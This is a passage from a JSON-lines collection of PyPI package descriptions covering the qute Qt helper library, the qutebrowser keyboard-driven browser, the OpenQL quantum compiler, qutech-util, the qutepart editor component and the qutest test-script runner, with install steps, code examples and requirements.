layoutself.layout().addWidget(self.spinner)self.layout().addWidget(self.checker)# -- Finally lets connect some signals and slots without# -- caring what it isqute.connectBlind(self.spinner,self.do_something)qute.connectBlind(self.checker,self.do_something)defdo_something(self,*args,**kwargs):print('doing something...')if__name__=='__main__':# -- Use qute to get or create the QApplication instanceq_app=qute.utilities.qApp()widget=MyWidget()widget.show()q_app.exec_()In this example we see some of the features of qute in use, but most importantly is that it is usable in environments using either PyQt, PySide or PySide2 (thanks to Qt.py), and then utilises the various helper functionality defined within qute which you can read about below.Cross Application SupportThis library is specifically intended for use when in environments where\nyou're actively trying to share/develop tools across multiple applications\nwhich support PyQt, PySide or PySide2.The premise is that you can request the main application window using\na common function regardless of the actual application - making it trivial\nto implement a tool which works in multiple host applications without any\nbespoke code.The current list of supported applications are:* Native Python\n* Maya\n* 3dsmax\n* Motion BuilderHere is an example:importquteclassMyCrossApplicationTool(qute.QWidget):def__init__(self,parent=None):super(MyCrossApplicationTool,self).__init__(parent=parent)self.setLayout(qute.QVBoxLayout())self.layout().addWidget(qute.QLabel('This tool will launch and parent under Max, Maya, Motion Builder or Pure Python'))# ------------------------------------------------------------------------------deflaunch(blocking=False,*args,**kwargs):# -- This will return the running QApplication instance, or create# -- one if one is not presentq_app=qute.qApp()# -- Create a window and set its parent 'blindly' to what qute# -- resolves as the main window.window=qute.QMainWindow(parent=qute.utilities.windows.mainWindow())# -- Assign our widget to the windowwindow.setCentralWidget(MyCrossApplicationTool(*args,**kwargs))window.show()ifblocking:q_app.exec_()launch()In the example above, we have a (somewhat simple!) tool, and we expose the\ntool through a launch function which is creating a main window. The crucial\npart is that the window is asking Qute to return the main application window\nrather than you relying on an application specific Ui.In doing this, you can copy/paste the code from the example into Max, Maya or\nMotion Builder and you will get the same widget, and that widget will be\ncorrectly parented under that application, making your Ui incredibly portably\nand re-usable without an application specific layer.StylingQute gives a convience function for applying stylesheets to Qt widgets. Crucually it also exposes a mechanism allowing you do define variables to be replaced within stylesheets. This helps when wanting to use the same values multiple times across a stylesheet.For example, if we have a stylesheet such as:QWidget{background-color:rgb(BG_COLOR);color:rgb(TEXT_COLOR);}QLabel{padding-top:7px;padding-bottom:7px;background-color:transparent;color:rgb(TEXT_COLOR);}This can be assigned to a widget using:importqutequte.utilities.styling.apply(css_str,apply_to=widget,BG_COLOR='50, 50, 50',TEXT_COLOR='255, 0, 0',)In this example we pass a CSS string and the widget we want to apply to. Any additional keywords will be used as search and replace elements. This is handy when wanting to change sections of your stylesheet easily. Your replacements can be numbers, strings or filepaths (just ensure your slashing is / and not \\). Thespaceexample stylesheet demonstrates this by using png files for widget backgrounds.Equally, you can pass the full path to a css/qss file too:qute.utilities.styling.apply('/usr/styles/my_style.qss',widget,)Alternatively you can have a library of style sheets and set the environment variableQUTE_STYLE_PATHto that location. By doing this you can pass the name of the style rather than the absolute path. Qute comes with one example stylesheet calledspacewhich can be used to demonstrate this as below:qute.utilities.styling.apply('space',widget,)This is an example of the space stylesheet:Menu GenerationGenerating menu's can be tedious and involve a lot of repetative code. In many cases a menu is made up of either actions, sseperators or sub-menus.Each of these are supported by the menu generation functionqute.utilities.menus.menuFromDictionary. The format of the dictionary you provide must conform to:{'Label': function}or{'Label': dict}or{'Label': None}If a function is given then the function is set as the callable when the item is clicked. If a dictionary is given as the value a submenu is generated (this is recusive, so you can nest menus). If the value is None then a Seperator will be added regardless of the key.Here is an example:importqutedeffoo():print('calling foo')defbar():print('calling bar')menu_definition={'Foo':foo,'-':None,'More':dict(bar=bar)}menu=qute.utilities.menus.menuFromDictionary(menu_definition)In this example we define some functions and add them as keys, we can then generate a QMenu from that dictionary. This is especially useful when you're dynamically generating menu from variable data.You can also define icons for your menu. To utilise this mechanism your icons must have the same name as the label and end in .png. You can then define the path to the icons during the menu call as shown here:menu=qute.utilities.menus.menuFromDictionary(structure=menu_definition,icon_paths=[os.path.dirname(__file__),])DeriveDerive is all about dynamically generating ui elements based on data types and being able to extract values from widgets without having to know what they are. This is particularly useful when generating ui elements on the fly without knowing what they are up front.A good example of this is the exposure of options or attributes on a class without knowing exactly what those options are. We can see an example of that here:importquteclassNode:\"\"\"Define a base class for something\"\"\"def__init__(self):self.options=dict()classCircle(Node):def__init__(self):self.options['radius']=5self.options['closed']=TrueclassQuadtrilateral(Node):def__init__(self):self.options['force_rectangle']defexample_callback(*args,**kwargs):print('In Callback')nodes=[Circle(),Quadtrilateral(),Quadtrilateral(),Circle(),]fornodeinnodes:foroption,valueinnode.options:# -- Blindly create a widget to represent the widgetwidget=qute.utilities.derive.deriveWidget(value=value,label=option,)# -- Connect the change event of the widget# -- to our callback - without knowing what# -- the widget is or what to connectqute.utilities.derive.connectBlind(widget,example_callback)We can also ask for the value from a widget without knowing what the widget is. This can be done using:importqutevalue=qute.utilities.derive.deriveValue(widget)This mechanism makes it easier to create dynamic ui's, especially when you're trying to expose data which can be manipulated on code objects.CompatabilityThis has been tested under Python 2.7.13 and Python 3.6.6 under both Windows and Ubuntu.ContributeIf you would like to contribute thoughts, ideas, fixes or features please get in touch!mike@twisted.space"} +{"package": "qutebrowser", "pacakge-description": "// SPDX-License-Identifier: GPL-3.0-or-later// If you are reading this in plaintext or on PyPi://// A rendered version is available at:// https://github.com/qutebrowser/qutebrowser/blob/main/README.asciidocqutebrowser===========// QUTE_WEB_HIDEimage:qutebrowser/icons/qutebrowser-64x64.png[qutebrowser logo] *A keyboard-driven, vim-like browser based on Python and Qt.*image:https://github.com/qutebrowser/qutebrowser/workflows/CI/badge.svg[\"Build Status\", link=\"https://github.com/qutebrowser/qutebrowser/actions?query=workflow%3ACI\"]image:https://codecov.io/github/qutebrowser/qutebrowser/coverage.svg?branch=main[\"coverage badge\",link=\"https://codecov.io/github/qutebrowser/qutebrowser?branch=main\"]link:https://www.qutebrowser.org[website] | link:https://blog.qutebrowser.org[blog] | https://github.com/qutebrowser/qutebrowser/blob/main/doc/faq.asciidoc[FAQ] | https://www.qutebrowser.org/doc/contributing.html[contributing] | link:https://github.com/qutebrowser/qutebrowser/releases[releases] | https://github.com/qutebrowser/qutebrowser/blob/main/doc/install.asciidoc[installing]// QUTE_WEB_HIDE_ENDqutebrowser is a keyboard-focused browser with a minimal GUI. It's basedon Python and Qt and free software, licensed under the GPL.It was inspired by other browsers/addons like dwb and Vimperator/Pentadactyl.// QUTE_WEB_HIDE**qutebrowser's primary maintainer, The-Compiler, is currently workingpart-time on qutebrowser, funded by donations.** To sustain this for a longtime, your help is needed! See thehttps://github.com/sponsors/The-Compiler/[GitHub Sponsors page] orhttps://github.com/qutebrowser/qutebrowser/blob/main/README.asciidoc#donating[alternative donation methods]for more information. Depending on your sign-up date and howlong you keep a certain level, you can get qutebrowser t-shirts, stickers andmore!// QUTE_WEB_HIDE_ENDScreenshots-----------image:doc/img/main.png[\"screenshot 1\",width=300,link=\"doc/img/main.png\"]image:doc/img/downloads.png[\"screenshot 2\",width=300,link=\"doc/img/downloads.png\"]image:doc/img/completion.png[\"screenshot 3\",width=300,link=\"doc/img/completion.png\"]image:doc/img/hints.png[\"screenshot 4\",width=300,link=\"doc/img/hints.png\"]Downloads---------See the https://github.com/qutebrowser/qutebrowser/releases[github releasespage] for available downloads and the link:doc/install.asciidoc[INSTALL] file fordetailed instructions on how to get qutebrowser running on various platforms.Documentation and getting help------------------------------Please see the link:doc/help/index.asciidoc[help page] for available documentationpages and support channels.Contributions / Bugs--------------------You want to contribute to qutebrowser? Awesome! Please readlink:doc/contributing.asciidoc[the contribution guidelines] for details anduseful hints.If you found a bug or have a feature request, you can report it in severalways:* Use the built-in `:report` command or the automatic crash dialog.* Open an issue in the Github issue tracker.* Write a mail to thehttps://listi.jpberlin.de/mailman/listinfo/qutebrowser[mailinglist] atmailto:qutebrowser@lists.qutebrowser.org[].Please report security bugs to security@qutebrowser.org(or if GPG encryption is desired, contact me@the-compiler.org with GPG IDhttps://www.the-compiler.org/pubkey.asc[0x916EB0C8FD55A072]).Alternatively,https://github.com/qutebrowser/qutebrowser/security/advisories/new[report a vulnerability]via GitHub'shttps://docs.github.com/en/code-security/security-advisories/guidance-on-reporting-and-writing/privately-reporting-a-security-vulnerability[private reporting feature].Requirements------------The following software and libraries are required to run qutebrowser:* https://www.python.org/[Python] 3.8 or newer* https://www.qt.io/[Qt], either 6.2.0 or newer, or 5.15.0 or newer, with the following modules:- QtCore / qtbase- QtQuick (part of qtbase or qtdeclarative in some distributions)- QtSQL (part of qtbase in some distributions)- QtDBus (part of qtbase in some distributions; note that a connection to DBus atruntime is optional)- QtOpenGL- QtWebEngine (if using Qt 5, 5.15.2 or newer), or- alternatively QtWebKit (5.212) - **This is not recommended** due to known securityissues in QtWebKit, you most likely want to use qutebrowser with thedefault QtWebEngine backend (based on Chromium) instead. Quoting thehttps://github.com/qtwebkit/qtwebkit/releases[QtWebKit releases page]:_[The latest QtWebKit] release is based on [an] old WebKit revision with knownunpatched vulnerabilities. Please use it carefully and avoid visiting untrustedwebsites and using it for transmission of sensitive data._* https://www.riverbankcomputing.com/software/pyqt/intro[PyQt] 6.2.2 or newer(Qt 6) or 5.15.0 or newer (Qt 5)* https://palletsprojects.com/p/jinja/[jinja2]* https://github.com/yaml/pyyaml[PyYAML]On Python 3.8, the following backport is also required:* https://importlib-resources.readthedocs.io/[importlib_resources]On macOS, the following libraries are also required:* https://pyobjc.readthedocs.io/en/latest/[pyobjc-core and pyobjc-framework-Cocoa]The following libraries are optional:* https://pypi.org/project/adblock/[adblock] (for improved adblocking using ABP syntax)* https://pygments.org/[pygments] for syntax highlighting with `:view-source`on QtWebKit, or when using `:view-source --pygments` with the (default)QtWebEngine backend.* On Windows, https://pypi.python.org/pypi/colorama/[colorama] for colored logoutput.* https://asciidoc.org/[asciidoc] to generate the documentation for the `:help`command, when using the git repository (rather than a release).See link:doc/install.asciidoc[the documentation] for directions on how toinstall qutebrowser and its dependencies.Donating--------**qutebrowser's primary maintainer, The-Compiler, is currently workingpart-time on qutebrowser, funded by donations.** To sustain this for a longtime, your help is needed! See thehttps://github.com/sponsors/The-Compiler/[GitHub Sponsors page] for moreinformation. Depending on your sign-up date and how long you keep a certainlevel, you can get qutebrowser t-shirts, stickers and more!GitHub Sponsors allows for one-time donations (using the buttons next to \"Select atier\") as well as custom amounts. **For currencies other than Euro or Swiss Francs, thisis the preferred donation method.** GitHub uses https://stripe.com/[Stripe] to acceptpayment via credit carts without any fees. Billing via PayPal is available as well, withless fees than a direct PayPal transaction.Alternatively, the following donation methods are available -- note thateligibility for swag (shirts/stickers/etc.) is handled on a case-by-case basisfor those, please mailto:mail@qutebrowser.org[get in touch] for details.* https://liberapay.com/The-Compiler[Liberapay], which can handle paymentsvia Credit Card, SEPA bank transfers, or Paypal. Payment fees are paid by me,but they are https://liberapay.com/about/faq#fees[relatively low].* SEPA bank transfer inside Europe (**no fees**):- Account holder: Florian Bruhin- Country: Switzerland- IBAN (EUR): CH13 0900 0000 9160 4094 6- IBAN (other): CH80 0900 0000 8711 8587 3- Bank: PostFinance AG, Mingerstrasse 20, 3030 Bern, Switzerland (BIC: POFICHBEXXX)- If you need any other information: Contact me at mail@qutebrowser.org.- If possible, **please consider yearly or semi-yearly donations**, becauseof the additional overhead from many individual transactions forbookkeeping/tax purposes.* PayPal:https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=me%40the-compiler.org&item_name=qutebrowser¤cy_code=CHF&source=url[CHF],https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=me%40the-compiler.org&item_name=qutebrowser¤cy_code=EUR&source=url[EUR],https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=me%40the-compiler.org&item_name=qutebrowser¤cy_code=USD&source=url[USD].**Note: Fees can be very high (around 5-40%, depending on the donated amounts)** - considerusing GitHub Sponsors (credit card), Liberapay (credit cards, PayPal, or banktransfer) or SEPA bank transfers instead.* Cryptocurrencies:- Bitcoin: link:bitcoin:bc1q3ptyw8hxrcfz6ucfgmglphfvhqpy8xr6k25p00[bc1q3ptyw8hxrcfz6ucfgmglphfvhqpy8xr6k25p00]- Bitcoin Cash: link:bitcoincash:1BnxUbnJ5MrEPeh5nuUMx83tbiRAvqJV3N[1BnxUbnJ5MrEPeh5nuUMx83tbiRAvqJV3N]- Ethereum: link:ethereum:0x10c2425856F7a8799EBCaac4943026803b1089c6[0x10c2425856F7a8799EBCaac4943026803b1089c6]- Litecoin: link:litecoin:MDt3YQciuCh6QyFmr8TiWNxB94PVzbnPm2[MDt3YQciuCh6QyFmr8TiWNxB94PVzbnPm2]- Others: Please mailto:mail@qutebrowser.org[get in touch], I'd happily set up anything link:https://www.ledger.com/supported-crypto-assets[supported by Ledger Live]Sponsors--------Thanks a lot to https://www.macstadium.com/[MacStadium] for supportingqutebrowser with a free hosted Mac Mini via theirhttps://www.macstadium.com/opensource[Open Source Project].(They don't require including this here - I've just been very happy with theiroffer, and without them, no macOS releases or tests would exist)Thanks to the https://www.hsr.ch/[HSR Hochschule f\u00fcr Technik Rapperswil], whichmade it possible to work on qutebrowser extensions as a student research project.image:doc/img/sponsors/macstadium.png[\"powered by MacStadium\",width=200,link=\"https://www.macstadium.com/\"]image:doc/img/sponsors/hsr.png[\"HSR Hochschule f\u00fcr Technik Rapperswil\",link=\"https://www.hsr.ch/\"]Authors-------qutebrowser's primary author is Florian Bruhin (The Compiler), but qutebrowserwouldn't be what it is without the help ofhttps://github.com/qutebrowser/qutebrowser/graphs/contributors[hundreds of contributors]!Additionally, the following people have contributed graphics:* Jad/link:https://yelostudio.com[yelo] (new icon)* WOFall (original icon)* regines (key binding cheatsheet)Also, thanks to everyone who contributed to one of qutebrowser'slink:doc/backers.asciidoc[crowdfunding campaigns]!Similar projects----------------Various projects with a similar goal like qutebrowser exist.Many of them were inspirations for qutebrowser in some way, thanks for that!Active~~~~~~* https://fanglingsu.github.io/vimb/[vimb] (C, GTK+ with WebKit2)* https://luakit.github.io/[luakit] (C/Lua, GTK+ with WebKit2)* https://nyxt.atlas.engineer/[Nyxt browser] (formerly \"Next browser\", Lisp, Emacs-like but also offers Vim bindings, QtWebEngine or GTK+/WebKit2 - note there was a https://jgkamat.gitlab.io/blog/next-rce.html[critical remote code execution in 2019] which was handled quite badly)* https://vieb.dev/[Vieb] (JavaScript, Electron)* https://surf.suckless.org/[surf] (C, GTK+ with WebKit1/WebKit2)* https://github.com/jun7/wyeb[wyeb] (C, GTK+ with WebKit2)* Chrome/Chromium addons:https://vimium.github.io/[Vimium]* Firefox addons (based on WebExtensions):https://tridactyl.xyz/[Tridactyl],https://addons.mozilla.org/en-GB/firefox/addon/vimium-ff/[Vimium-FF]* Addons for Firefox and Chrome:https://github.com/brookhong/Surfingkeys[Surfingkeys] (https://github.com/brookhong/Surfingkeys/issues/1796[somewhat sketchy]...),https://lydell.github.io/LinkHints/[Link Hints] (hinting only),https://github.com/ueokande/vimmatic[Vimmatic]Inactive~~~~~~~~* https://bitbucket.org/portix/dwb[dwb] (C, GTK+ with WebKit1,https://bitbucket.org/portix/dwb/pull-requests/22/several-cleanups-to-increase-portability/diff[unmaintained] -main inspiration for qutebrowser)* https://github.com/parkouss/webmacs/[webmacs] (Python, Emacs-like withQtWebEngine, https://github.com/parkouss/webmacs/issues/137[unmaintained])* https://sourceforge.net/p/vimprobable/wiki/Home/[vimprobable] (C, GTK+ withWebKit1)* https://pwmt.org/projects/jumanji/[jumanji] (C, GTK+ with WebKit1)* http://conkeror.org/[conkeror] (Javascript, Emacs-like, XULRunner/Gecko)* https://www.uzbl.org/[uzbl] (C, GTK+ with WebKit1/WebKit2)* https://github.com/conformal/xombrero[xombrero] (C, GTK+ with WebKit1)* https://github.com/linkdd/cream-browser[Cream Browser] (C, GTK+ with WebKit1)* Firefox addons (not based on WebExtensions or no recent activity):http://www.vimperator.org/[Vimperator],http://bug.5digits.org/pentadactyl/index[Pentadactyl],https://github.com/akhodakivskiy/VimFx[VimFx] (seems to offer ahttps://gir.st/blog/legacyfox.htm[hack] to run on modern Firefox releases),https://github.com/shinglyu/QuantumVim[QuantumVim],https://github.com/ueokande/vim-vixen[Vim Vixen] (ESR only),https://github.com/amedama41/vvimpulation[VVimpulation],https://krabby.netlify.com/[Krabby]* Chrome/Chromium addons:https://github.com/k2nr/ViChrome/[ViChrome],https://github.com/jinzhu/vrome[Vrome],https://github.com/lusakasa/saka-key[Saka Key] (https://github.com/lusakasa/saka-key/issues/171[unmaintained]),https://github.com/1995eaton/chromium-vim[cVim],https://github.com/dcchambers/vb4c[vb4c] (fork of cVim, https://github.com/dcchambers/vb4c/issues/23#issuecomment-810694017[unmaintained]),https://glee.github.io/[GleeBox]* Addons for Safari:https://televator.net/vimari/[Vimari]License-------This program is free software: you can redistribute it and/or modifyit under the terms of the GNU General Public License as published bythe Free Software Foundation, either version 3 of the License, or(at your option) any later version.This program is distributed in the hope that it will be useful,but WITHOUT ANY WARRANTY; without even the implied warranty ofMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See theGNU General Public License for more details.You should have received a copy of the GNU General Public Licensealong with this program. If not, see .pdf.js------qutebrowser optionally uses https://github.com/mozilla/pdf.js/[pdf.js] todisplay PDF files in the browser. Windows releases come with a bundled pdf.js.pdf.js is distributed under the terms of the Apache License. You canfind a copy of the license in `qutebrowser/3rdparty/pdfjs/LICENSE` (in theWindows release or after running `scripts/dev/update_3rdparty.py`), or onlinehttps://www.apache.org/licenses/LICENSE-2.0.html[here]."} +{"package": "qutechopenql", "pacakge-description": "OpenQL FrameworkOpenQL is a framework for high-level quantum programming in C++/Python. The\nframework provides a compiler for compiling and optimizing quantum code. The\ncompiler produces the intermediate quantum assembly language and the compiled\nmicro-code for various target platforms. While the microcode is\nplatform-specific, the quantum assembly code\n(incQASMformat) is hardware-agnostic and\ncan be simulated on the QX simulator.OpenQL's source code is released under the Apache 2.0 license.For detailed user and contributor documentation, please visit theReadTheDocspage.DependenciesThe following utilities are required to compile OpenQL from sources:C++ compiler with C++23 support (gcc 11, clang 14, msvc 17)CMake>= 3.12gitPython3.x pluspip, with the following package:conan>= 2.0Python build specific dependenciesSWIG(Linux: >= 3.0.12, Windows: >= 4.0.0)Optionally:Documentation generation:doxygenConvert graphs fromdottopdf,png, etc:Graphviz DotutilityVisualize generated graphs indotformat:XDotUse the visualizer in MacOS:XQuartzAnd the following Python packages:plumbumqxelaratorsetuptoolswheelOptionally:Testing:numpy, andpytestDocumentation generation:m2r2,sphinx==7.0.0, andsphinx-rtd-themeARM specific dependenciesWe are having problems when using them4andzulu-opendjkConan packages on an ARMv8 architecture.m4is required by Flex/Bison andzulu-openjdkprovides the Java JRE required by the ANTLR generator.\nSo, for the time being, we are installing Flex/Bison and Java manually for this platform.Flex>= 2.6.4Bison>= 3.0Java JRE>= 11BuildThis version of OpenQL can only be compiled via theconanpackage manager.\nYou'll need to create a default profile before using it for the first time.The installation ofOpenQLdependencies, as well as the compilation, can be done in one go.git clone https://github.com/QuTech-Delft/OpenQL.git\ncd OpenQL\nconan profile detect\nconan build . -pr=conan/profiles/tests-debug -b missingNotice:theconan profilecommand only has to be run only once, and not before every build.theconan buildcommand is buildingOpenQLin Debug mode with tests using thetests-debugprofile.the-b missingparameter asksconanto build packages from sources\nin case it cannot find the binary packages for the current configuration (platform, OS, compiler, build type...).Build profilesA group of predefined profiles is provided under theconan/profilesfolder.\nThey follow the[tests-](debug|release)[-unitary]naming convention. For example:releaseis a Release build without tests and unitary decomposition disabled.tests-debug-unitaryis a Debug build with tests and unitary decomposition enabled.All the profiles set the C++ standard to 23.Build optionsProfiles are a shorthand for command line options. The command above could be written as well as:conan build . -s:h compiler.cppstd=23 -s:h openql/*:build_type=Debug -o openql/*:build_tests=True -o openql/*:disable_unitary=True -b missingThese are the list of options that could be specified whether in a profile or in the command line:openql/*:build_type: defaulted toRelease, set toDebugif you want Debug builds.openql/*:build_tests: defaulted toFalse, set toTrueif you want to build tests.openql/*:disable_unitary: defaulted toFalse, set toTrueif you want to disable unitary decomposition.openql/*:shared: defaulted toFalse, set toTrueif you want OpenQL to be built as a shared library.\nThe default option is mandatory on Windows.InstallFrom PythonInstall from the project root directory as follows:python3 -m pip install -v .You can test if it works by running:python3 -m pytest -vFrom C++TheCMakeLists.txtfile in the root directory includes install targets:conan create --version 0.11.2 . tests-debug -b missingYou can test if it works by doing:cd test/Debug\nctest -C Debug --output-on-failureUse from another projectFrom PythonAfter installation, you should be able to use the bindings for the original API by justimport openql as ql.\nThe new API doesn't have Python bindings yet.From C++The easiest way to use OpenQL in a CMake project is to fetch the library and then link against it.include(FetchContent)\nFetchContent_Declare(OpenQL\n GIT_REPOSITORY https://github.com/QuTech-Delft/OpenQL.git\n GIT_TAG \"\"\n)\nFetchContent_MakeAvailable(OpenQL)\ntarget_include_directories( SYSTEM PRIVATE \"${OpenQL_SOURCE_DIR}/include\")\ntarget_link_libraries( PUBLIC ql)Note that the following dependencies are required forOpenQLto build:Flex>= 2.6.4Bison>= 3.0Java JRE>= 11"} +{"package": "qutech-util", "pacakge-description": "qutil / qutech_utilLong term goal is to gather utility functions here.\nThe original name wasqutilbut we included the additional aliasqutech_utilso you can install it viapipy.\nIt is not meant as a lightweight package but some heavy dependencies like qcodes are feature gated.\nIf you don't have a reason for a lightweight install you should install all features i.e.qutil[complete].\nIf you just want to use it you can install the latest \"released\" version viapython-mpipinstallqutech-util[complete]However, this package profits from everybody's work and the releases are infrequent. Please make a development install\nand contribute your changes. You can do this viapython-mpipinstall-egit+https://git.rwth-aachen.de/qutech/qutil.git#egg=qutech-util[complete]This will download the source code (i.e. clone the git repository) into a subdirectory of the./srcargument and link the files into your environment instead of copying them. If you are on windows you can useSourceTreewhich is a nice GUI for git.\nYou can specify the source code directory with the--srcargument (which needs to be BEFORE-e):python-mpipinstall--srcsome_directory/my_python_source-egit+https://git.rwth-aachen.de/qutech/qutil.git#egg=qutech-util[complete]If you have already downloaded/cloned the package yourself you can usepython -m pip install -e .[complete].Please file an issue if any of these instructions does not work.TestsThere is no plan for writing extensive tests for the code in this package but please try to write proper docstrings for\nyour functions and include examples in them which can be checked viadoctest.\nFollow the link for an example for an example :)You can run the tests either viapython-mpytest--doctest-modulesor to check if everything works for a clean install (requires hatch to be installed)python-mhatchruntest:runDocumentationThe auto-generated documentation can be found atthe Gitlab Pages.To build the documentation locally, navigate todoc/and run either.\\make.bat html(on Windows),makehtml(on Unix), orsphinx-build -b html source buildMake sure the dependencies are installed viapython-mpipinstall-e.[doc]in the top-level directory.qutil.plottingThis module contains useful classes and functions surroundingmaptlotlibplots.cycle_plotshelps you cycling through many plots with the arrow keys (there are probably much better functions for this out there)plot_2d_dataframehelps you plot 2d data frames with numeric indicesBlitManagercan be used to significantly speed up plotting when certain parts of the plot, such as the artists on the canvas (lines, annotations, etc.) change but others do not (axes, labels, etc.) does not.CoordClickerandLineClickerallow some interactive selection of data.get_rwth_color_cycleand the predefinedrwth_color_cycleare cycler instances with the official RWTH corporate design colors:qutil.matlabIn this module there are functions that are helpful for reading.matfiles, especially those created with special measure.\nIt depends on the optionalmatlabfeature which is included in the complete install.\nIf you simply want to open a random.matfile you can usehdf5storage.loadmat.\nSome functionality requires the matlab engine python interface to work, i.e. python will use a MATLAB instance to open files.\nHowever, the matlab engine interface isnotinstalled by default because the install process depends on the version and fails if MATLAB is not installed.\nFor older MATLAB versions navigate to$MATLAB_INSTALL_FOLDER/extern/engines/pythonand executepython setup.py install.\nFor newer MATLAB versions you can install the engine interface viapython -m pip install matlabengine.Loading matlab files with \"newer\" MATLAB classes liketablerequires connecting (and starting) MATLAB instance.\nThe functionload_special_measure_with_matlab_enginecan load most special measure scans by utilizing the MATLAB engine interface. To use it you require a \"sufficiently new\" version of MATLAB and then navigate toC:\\Program Files\\MATLAB\\$VERSION\\extern\\engines\\pythonand callpython setup.py install.Recommended: There are dataclasses likeSimpleScanorVirtualScanthat are a python representation of certain common scan\ntypes and have a convenienceto_xarraymethod. Useload_simple_scan_with_matlab_engineorload_virtual_scan_with_matlab_engineto load them.There are the dataclassesFigureData,AxesDataandPlotDatathat represent matlab figure data. They help inspecting saved matlab figures with the help of a matlab engine.qutil.constThis module defines all the constants you could wish for as well as functions to convert temperatures (convert_temperature) or between wavelengths and frequencies (lambda2nu,nu2lambda). For an overview, see the module docstring.qutil.linalgThis module provides several handy linear algebra functions. While some are implemented elsewhere, the implementation here is typically speedier for large arrays. For example,pauli_expmexploits the fact that a matrix exponential of Pauli matrices can be written as a cosine times the identity matrix plus a sine times the Paulis to speed up the calculation.For an overview of the included functions, see the module docstring.qutil.uiThis module collects UI helpers, such as a progress bar for loops that can be used like so:foriinqutil.ui.progressbar(range(n)):do_something()qutil.qiIn this module there are some quantities and functions related to quantum information, like the Pauli matrices in different data types.qutil.randomHere we collect functions for random numbers likerandom_hermitianto generate random Hermitian matrices.qutil.itertoolsThis module contains everything fromitertools,more_itertoolsand custom functions.qutil.cachingHere you find decorators, functions and classes that help you implement caching likefile_cacheandlru_cache. This is helpful if you need to call computationally expensive functions with the same arguments repeatedly.qutil.ioUser input related functions likequery_yes_noor aCsvLoggerinterface (for reading use pandas.read_csv).to_global_pathresolves all network drive mappings (such asZ:\\) as well as domain names\n(such as\\\\janeway) to their global address (\\\\janeway.physik.rwth-aachen.dein this case).qutil.parallelFunctions and classes related to parallel execution i.e. multi-threading, multi-processing and asyncio.\nThere is a class for periodic callbacks from another threadThreadedPeriodicCallback.qutil.hardwareThis package contains little scripts to talk to various hardware devices. For example reading the leak tester via serial interface.qutil.electronicslumped_elementsExposes the contents offastz, a package for simple lumped-elements calculations. Overloads+and//to implement series and parallel connections, respectively.See thefastzdocumentation for more information.qutil.qcodesFunctions to convert from and to qcodes data sets. Currently only\nfrompandas.DataFrametoqcodes.data.data_set.DataSetqutil.measurementThis package is supposed to contain measurement-related functionality. It is currently empty besides some backward compatibility imports.spectrometerMoved tohttps://git.rwth-aachen.de/qutech/python-spectrometer.qutil.typecheckFunctions and decorators to help with runtime typechecking. Notably the@check_literalsdecorator to ensure that arguments match an annotated literal.\nImports thetypeguardwhich provides the powerful@typecheckeddecorator.fromtypingimportLiteral,Sequencefromqutil.typecheckimportcheck_literals@check_literalsdefmy_function(a:Sequence[int],b:Literal['forward','backward']):pass# do something# worksmy_function([1,2,3],'backward')# works because the first arguement is not checked at runtimemy_function({'no':'sequence'},'backward')# runtime error because of typo in 'backward'my_function('wrong','backwardd')qutil.pandas_toolsPandas utility functions for common code patterns.consecutive_groupbyis likepandas.DataFrame.groupbybut only\ngroups consecutive rows.qutil.imageImage and video processing tools.convert_tiffconverts a multipage.tifimage to a video with a format of choice usingmoviepy."} +{"package": "qutepart", "pacakge-description": "Code editor component for PyQt5NOTEwheels released on PyPi doesn't contain C extension which speedups long file hihglighting.\nBuild Qutepart from sources if speed is critical for your project. You can help releasing binary parser by implementingthis issueComponent has been created forEnki editorAPI documentationFeaturesSyntax highlighting for 196 languagesSmart indentation for many languagesLine numbersBookmarksAdvanced edit operationsMatching braces highlightingAutocompletion based on document contentMarking too long lines with red lineRectangular selection and copy-pasteVim modeQutepart and KatepartKateand Katepart (an editor component) is really cool software. The Kate authors and community have created, probably, the biggest set of highlighters and indenters for programming languages.Qutepart uses Kate syntax highlighters (XML files)Qutepart contains a port from Javascript to Python of Kate indenters (12% of the code base in version 1.0.0)Qutepart doesn't contain Katepart code.Nothing is wrong with Katepart. Qutepart has been created to enable reusing highlighters and indenters in projects where a KDE dependency is not acceptable.AuthorAndrei Kopatsandrei.kopats@gmail.comBug reports, patchesGithub pageLicenseLGPL v2"} +{"package": "qutest", "pacakge-description": "Thequtest.pypackage is atest-scriptrunner for theQUTest testing system.General RequirementsIn order to run tests in theQUTest environment, you need the following three components:Thetest fixture in C or C++running on a remote target (or the host computer)TheQSPY host applicationrunning and connected to the targetThequtest.pyscript runner and some test scripts.NOTE:Thequtest.pyscript runner requires standard Python 3, which is included in\ntheQTools distributionfor Windows\nand is typically included with other host operating systems, such as Linux and macOS.InstallationThequtest.pyscript runner can be used standalone, without installation in your Python system (seeExamples below).NOTE:Thequtest.pyscript is included in theQTools collection. Also, the QTools collection for Windows already includes Python 3, so you don't need to install anything extra.Alternatively, you can install thequtest.pypackage withpipfrom thePyPi indexby executing the following command:pip install qutestOr directly from the sources directory (e.g.,/qp/qtools/qutest):python setup.py install --install-dir=/qp/qtools/qutestUsingqutest.pyIf you are usingqutest.pyas a standalone Python script, you invoke it as follows:python3 /qutest.py Alternatively, if you've installedqutest.pywithpip, you invoke it as follows:qutest Command-line OptionsThe Python test scripts are executed by the QUTest test script runner 1qutest.py1 (typically located in 1qtools/qutest/ folder), with the following usage:ATTENTIONThequtest.pyscript runner command-line options have been expanded and changed at version 7.2.0. Unfortunately, it was not possible to preserve the backwards compatibility with the earlier versions.usage: python qutest.py [-h] [-v] [-e [EXE]] [-q [QSPY]] [-l [LOG]] [-o [OPT]] [scripts ...]\n\nQUTest test script runner\n\npositional arguments:\n scripts List (comma-separated) of test scripts to run\n\noptions:\n -h, --help show this help message and exit\n -v, --version Display QUTest version\n -e [EXE], --exe [EXE]\n Optional host executable or debug/DEBUG\n -q [QSPY], --qspy [QSPY]\n optional qspy host, [:ud_port][:tcp_port]\n -l [LOG], --log [LOG]\n Optional log directory (might not exist yet)\n -o [OPT], --opt [OPT]\n xcob: x:exit-on-fail, c:qspy-clear, o:qspy-save-txt, b:qspy-save-bin\n\nMore info: https://www.state-machine.com/qtools/qutest.html-x- optional flag that causesqutestto exit on first test failure.test_scripts- optional specification of the Python test scripts to run.\nIf not specified, qutest will try to run all *.py files in the current\ndirectory as test scriptshost_exe | DEBUG- optional specification of the test-fixture compiled\nfor the host (host executable) for testing on thehost computer.\nThe special 